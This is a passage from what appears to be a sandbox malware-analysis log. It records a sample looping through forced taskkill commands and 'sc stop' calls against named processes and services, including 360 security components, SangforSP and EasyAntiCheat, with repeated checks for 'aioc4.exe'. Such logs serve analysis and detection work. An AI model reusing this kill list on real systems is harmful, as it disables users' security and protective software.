C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
PID:2256

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
PID:2084

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:2068

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
- Kills process with taskkill
PID:1168

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
PID:2732

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
- Kills process with taskkill
PID:1660

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
PID:2132

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
PID:548

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
PID:1536

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
PID:2896

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
PID:2844

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
PID:824

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
PID:836

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:964

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
PID:2556

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:2368

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
PID:3020

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
- Kills process with taskkill
PID:960

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:3028

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
PID:1252

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:2348

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
PID:2748

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
PID:3032

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
PID:984

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
PID:1380

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
- Kills process with taskkill
PID:2764

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
- Kills process with taskkill
PID:2872

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
PID:2624

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
PID:2380

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
PID:2620

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
PID:2716

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:1536

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
PID:1692

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
PID:2668

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
PID:2188

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:1628

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:1700

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
PID:2196

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
- Kills process with taskkill
PID:2928

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
PID:2548

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
PID:1784

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
PID:2116

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
- Launches sc.exe
PID:3036

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:2936

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
PID:2904

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
PID:1932

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
PID:2812

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
PID:1400

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
- Launches sc.exe
PID:2128

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
PID:2472

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
- Launches sc.exe
PID:2468

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
PID:2688

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
PID:2864

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
- Launches sc.exe
PID:2640

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
- Launches sc.exe
PID:2792

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
PID:2600

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:2956

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:1760

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:1648

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2352

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:3028

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:1252

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
PID:2932

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:2844

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:2924

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:2476

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:3012

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
- Kills process with taskkill
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
- Kills process with taskkill
PID:2544

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:1560

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
PID:1400

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
PID:2496

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
PID:2876

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:2792

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
PID:2880

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
PID:2840

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
- Kills process with taskkill
PID:568

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
PID:3020

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
PID:2856

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
PID:548

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
PID:1168

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
PID:2828

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
PID:2304

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
- Kills process with taskkill
PID:2108

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:2256

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
- Kills process with taskkill
PID:2508

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:2652

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
PID:2744

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
- Kills process with taskkill
PID:3004

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
PID:1756

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:2012

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
PID:3044

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
PID:2436

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
PID:2712

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
PID:1784

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
PID:1560

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
- Kills process with taskkill
PID:2788

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
PID:2832

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
PID:2852

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
PID:2600

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:2260

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
- Kills process with taskkill
PID:272

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
PID:1760

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
PID:2716

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:2732

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:1008

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
PID:2616

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
PID:844

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
PID:2176

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
PID:2836

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
PID:1884

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:2196

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
PID:2264

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
PID:3044

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
PID:2520

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
PID:2224

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
- Launches sc.exe
PID:3060

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
- Launches sc.exe
PID:2820

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
PID:2684

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
PID:2612

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
PID:2116

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
PID:3036

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
- Launches sc.exe
PID:2968

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
- Launches sc.exe
PID:2884

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:2388

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:836

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:964

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2128

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:2864

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:2656

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
- Kills process with taskkill
PID:2608

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:2492

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
- Kills process with taskkill
PID:2352

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
PID:2220

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:2932

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:2696

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
PID:2800

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
PID:2704

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:2376

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
PID:1364

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
PID:3036

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
- Kills process with taskkill
PID:2632

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
PID:1700

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:1948

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
PID:1404

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
PID:2456

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
PID:2688

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
PID:2720

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
PID:1380

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
PID:2444

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
PID:2792

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
PID:2680

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
PID:1356

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
PID:2856

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:3028

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
PID:1036

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:2360

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
PID:2108

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
PID:2304

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
PID:2724

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:3024

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
- Kills process with taskkill
PID:2552

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
PID:2612

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
- Kills process with taskkill
PID:556

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
- Kills process with taskkill
PID:1996

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
PID:2324

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
PID:1800

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
PID:1756

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
- Kills process with taskkill
PID:2544

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:2388

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
- Kills process with taskkill
PID:1560

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
PID:2904

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
PID:2788

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:2468

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:2604

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
- Kills process with taskkill
PID:2820

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
PID:2640

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
PID:2656

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
PID:2880

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
- Launches sc.exe
PID:2152

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
- Launches sc.exe
PID:2260

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:2952

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
PID:2680

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
- Launches sc.exe
PID:2916

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
- Launches sc.exe
PID:2840

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
- Launches sc.exe
PID:2352

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
PID:2540

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
- Launches sc.exe
PID:2244

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
PID:3020

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
- Launches sc.exe
PID:2816

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
PID:1660

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
PID:1760

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
PID:2328

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
PID:2892

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:3028

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:2100

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:2080

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2216

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:2576

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:2452

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
PID:1572

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:968

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:1644

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
PID:2460

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:2288

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:1628

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
PID:2168

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
PID:2736

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:2920

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
PID:2488

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
PID:1500

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
PID:524

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
PID:2780

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:2692

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
PID:2496

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
- Kills process with taskkill
PID:2976

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
PID:2656

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
PID:2556

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
- Kills process with taskkill
PID:2492

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
PID:2808

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
PID:2984

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
- Kills process with taskkill
PID:1168

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
PID:3040

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
PID:2132

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:2564

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
PID:1556

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:1884

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
- Kills process with taskkill
PID:2836

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
PID:1164

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:2216

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
PID:2372

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:2308

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
PID:1644

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
PID:2460

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
- Kills process with taskkill
PID:2288

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
PID:1628

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
PID:2168

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
PID:2736

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
- Kills process with taskkill
PID:2920

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
PID:2488

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
PID:1500

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
- Kills process with taskkill
PID:524

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:2780

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
PID:2692

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
- Kills process with taskkill
PID:2496

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
PID:2224

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:2976

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:2568

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
PID:2888

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
PID:2644

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
PID:2956

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
- Launches sc.exe
PID:1356

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
- Launches sc.exe
PID:960

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
- Launches sc.exe
PID:1316

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:2808

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
- Launches sc.exe
PID:2892

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
PID:1828

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
- Launches sc.exe
PID:2348

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
PID:664

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
- Launches sc.exe
PID:2144

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
PID:1692

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
PID:1888

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
- Launches sc.exe
PID:1036

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
PID:2008

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
PID:1600

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
PID:2772

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
- Launches sc.exe
PID:2760

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:2392

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:596

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:2428

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2596

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:2324

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:292

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
PID:1800

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:2592

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:2432

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
PID:2084

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:2472

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:836

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
PID:1820

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
- Kills process with taskkill
PID:2720

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
PID:2340

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
PID:2712

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
PID:2268

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
PID:2588

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:2536

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
PID:2260

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
PID:2764

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
PID:2644

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
PID:1972

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
PID:2716

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
PID:2756

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
PID:2772

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
- Kills process with taskkill
PID:2016

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
PID:2800

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:2724

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
PID:2924

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
